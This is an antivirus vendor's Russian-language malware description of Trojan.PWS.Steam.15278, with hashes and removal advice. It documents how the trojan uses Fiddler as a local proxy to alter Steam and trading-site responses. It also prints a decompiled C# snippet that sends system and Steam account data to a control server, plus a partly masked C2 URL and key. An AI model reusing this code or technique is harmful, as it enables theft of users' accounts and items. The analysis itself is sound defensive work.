Защити созданное

Другие наши ресурсы

  • free.drweb.ru — бесплатные утилиты, плагины, информеры
  • av-desk.com — интернет-сервис для поставщиков услуг Dr.Web AV-Desk
  • curenet.drweb.ru — сетевая лечащая утилита Dr.Web CureNet!
  • www.drweb.ru/web-iq — ВебIQметр
Закрыть

Библиотека
Моя библиотека

+ Добавить в библиотеку

Моя библиотека

Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32 | Skype

Свяжитесь с нами

Профиль

Профиль

Trojan.PWS.Steam.15278

Добавлен в вирусную базу Dr.Web:2017-12-19
Описание добавлено:2018-05-29

SHA1

  • 2891c6502586de470cad2108c4367ef23b375ff7
  • 3de7719afc981ee96b97300a4cd18b9365c771bf

Троянец для кражи игровых предметов у пользователей Steam. Использует утилиту Fiddler для перехвата ответов сервера и подмены данных в них. Fiddler устанавливается в качестве прокси на зараженном компьютере. Порт, который он будет использовать, указывается в конфигурации троянца (в исследованных образцах это порт 8333). Также Fiddler устанавливает в системе корневой сертификат, что позволяет ему перехватывать зашифрованный https-трафик.

С использованием системного реестра Windows определяет путь до директории Steam, языковые настройки операционной системы и имя пользователя из поля AutoLoginUser. В папке Steam троянец проверяет наличие файла \config\loginusers.vdf: если файл присутствует, вредоносная программа выполняет его синтаксический разбор и извлекает из него пары вида «имя учетной записи <=> steamid64».

Собранную информацию троянец отсылает на управляющий сервер (эти данные собираются с интервалом в 30 минут):

NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("type", "s");
nameValueCollection.Add("keyAccess", "809af20434864b142664613a8e42ff78");
nameValueCollection.Add("systemOS", value);
nameValueCollection.Add("systemUser", userName);
nameValueCollection.Add("systemMachine", machineName);
nameValueCollection.Add("languageOS", englishName);
nameValueCollection.Add("steamids", value2);
nameValueCollection.Add("steamPath", Class0.string_4);
nameValueCollection.Add("steamLang", Class0.string_6);
nameValueCollection.Add("steamRememberL", Class0.string_5);
nameValueCollection.Add("online", online.ToString());
Class0.POSTWithFakerHeader(Class0.soft2_req, nameValueCollection);

Сохраняет в собственную папку следующие файлы:

  • Windows Host.exe – тело троянца;
  • settings.conf – конфигурация Fiddler;
  • FiddlerCore.dll – библиотека Fiddler с действительной цифровой подписью;
  • BCMakeCert.dll – библиотека с открытым исходным кодом BouncyCastle.Crypto;
  • CertMaker.dll – плагин ICertificateProvider для FiddlerCore.

Модифицирует ветвь системного реестра [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] для обеспечения собственной автозагрузки. В ресурсах троянца имеется еще один исполняемый файл — Proxy.Resources.Cleaner.exe. Он используется для запуска и последующего выключения Fiddler.

Устанавливает свой обработчик для функции OnBeforeResponse библиотеки Fiddler, которая позволяет изменять отклики сервера на сетевые запросы. Обработчик игнорирует запросы, в URL которых присутствуют значения ".bmp", ".jpg", ".jpeg", ".js", ".png", ".ico", ".svg", ".pdf" и "localhost". Если в конфигурации вредоносной программы установлен специальный флаг, и пользователь заходит на один из следующих сайтов: opskins.com, igxe.cn, bitskins.com, g2a.com, csgo.tm, market.csgo.com, market.dota2.net, tf2.tm, в код веб-страниц внедряется загруженный с управляющего сервера вредоносный сценарий. Он подменяет получателя игровых предметов при совершении обменных сделок на указанных сайтах.

Если в конфигурации троянца установлен соответствующий флаг, и пользователь зараженного компьютера заходит на сайт steamcommunity.com, троянец отсылает на управляющий сервер POST-запрос следующего вида:

https://f****.pro/soft2/base.php?l=bG9ta2F0b3A%3D&k=809af20434864b142664613a8e42ff78&ek=cba2c8e810c06a917f95f6f424fbffa0

В запросе передаются данные {"type": "r", "keyAccess": "809af20434864b142664613a8e42ff78"}, при этом также в HTTP-запрос добавляется параметр "faker": "gl". В полученном ответе символы '\xD1\x96' меняются на 'i', '\xD1\x81' на 'c' и '(' на '=', после чего он декодируется с использованием base64. Расшифрованные данные представляют собой конфигурацию троянца, которая содержит steamid пользователя, в инвентаре которого нужно осуществлять подмену, а также параметры предметов для подмены.

Если в HTTP-запросе в качестве типа контента указан HTML, URL содержит значения "steamcommunity.com", "/tradeoffer", и при этом соединение осуществляется по протоколу HTTP, троянец подменяет ответ сервера на ошибку с кодом 302 и переключает соединение на использование HTTPS.

Если в HTTP-запросе в качестве типа контента указан JSON, и URL содержит значения "steamcommunity.com/profiles/7656", "/inventory/json/" или "steamcommunity.com/tradeoffer", "partnerinventory" , "partner=", "appid=", извлекает steamid партнера и проверяет, если ли для такого steamid параметры в данных, поступивших от сервера. Если нет, ничего не делает.

Затем троянец извлекает из URL значение steamid64 партнера по сделке и проверяет, имеются ли для такого steamid64 параметры в полученных от управляющего сервера данных. Читает параметр «Cookie» HTTP-заголовка и проверяет установленный там язык в параметре "Steam_Language". Если в качестве "Steam_Language" указан русский язык, троянец будет показывать сообщения на русском, в остальных случаях — на английском языке.

Для игровых предметов, у которых совпали значения jobject2["rgDescriptions"][jproperty.Name]["market_hash_name"] с указанными в ключе для данных от сервера, переданных для этого steamid, подменяются поля "market_hash_name", "market_name", "name", "name_color", "icon_url", "icon_url_large", "description"->"value" в rgDescription. Вместо них помещаются данные, поступившие с управляющего сервера. Поле "classid" не подменяется.

Если в HTTP-запросе в качестве типа контента указан JSON, и URL содержит значения "steamcommunity.com/inventory/", троянец извлекает из URL значение steamid64 и проверяет, имеются ли для такого steamid64 параметры в полученных от управляющего сервера данных. Читает параметр «Cookie» HTTP-заголовка и проверяет установленный там язык в параметре "Steam_Language". Если в качестве "Steam_Language" указан русский язык, троянец будет показывать сообщения на русском, в остальных случаях — на английском языке. Затем для игровых предметов, у которых совпали значения jobject2["rgDescriptions"][jproperty.Name]["market_hash_name"] с указанными в поле "name" в полученных от управляющего сервера данных steamid, подменяются поля на значения, поступившие с управляющего сервера.

Если в HTTP-запросе в качестве типа контента указан HTML, и URL содержит значения "steamcommunity.com/economy/itemclasshover/" и "content_only=1", троянец выполняет синтаксический разбор страницы и определяет steamid. Затем он пытается подменить характеристики игровых предметов в соответствии с данными, полученными от управляющего сервера.

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
  3. Если работа операционной системы заблокирована вредоносной программой семейства Trojan.Winlock, воспользуйтесь сервисом разблокировки компьютера. Если подобрать код разблокировки не удалось, действуйте согласно инструкции, представленной в п.2.
Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

На 1 месяц (без регистрации) или 3 месяца (с регистрацией и скидкой на продление)

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно

На 14 дней

Российский разработчик антивирусов Dr.Web

Опыт разработки с 1992 года

Dr.Web пользуются в 200+ странах мира

Dr.Web в Реестре Отечественного ПО

Поставка антивируса как услуги с 2007 года

Круглосуточная поддержка на русском языке

© «Доктор Веб»
2003 — 2018

«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с 1992 года.

125040, Россия, Москва, 3-я улица Ямского поля, вл.2, корп.12А